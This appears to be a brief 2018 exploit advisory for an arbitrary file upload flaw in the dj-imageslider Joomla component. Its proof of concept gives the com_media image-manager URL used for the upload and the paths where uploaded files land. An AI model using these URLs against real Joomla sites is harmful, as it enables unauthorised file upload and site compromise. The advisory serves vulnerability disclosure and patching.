# Exploit Title: [Joomla! Component dj-imageslider 3.2.3-3.1.0 - Arbitrary File Upload Vulnerability]
# Google Dork: [no]
# Date: [2018-06-05]
# Exploit Author: [41!kh4224rDz]
===========================================================================================================
# Vendor Homepage: [link]
#  Software Link: [https://dj-extensions.com/downloads/doc_download/82-dj-imageslider-aio-all-in-one-joomla-3x]  3.2.3
#  Software Link: [https://dj-extensions.com/downloads/doc_download/234-dj-imageslider-aio-all-in-one-joomla-25]  3.1.0   
======================================================================================================================
# Version: [3.2.3-3.1.0] 
# Tested on: [Win 7/Google chrome]

ذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذ
#  POC: 

# Exploit:

# http://localhost/[PATH]/index.php?option=com_media&view=images&tmpl=component&fieldid=jform_image&e_name=&asset=com_djimageslider&author=&folder=

# For Exmple:  site.com/[PATH]/index.php?option=com_media&view=images&tmpl=component&fieldid=jform_image&e_name=&asset=com_djimageslider&author=&folder=

# http://localhost/[PATH]/images/name.jpg

# http://localhost/[PATH]/images//name.txt

ذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذ

exploit-db ,exploitalert,cxsecurity ..................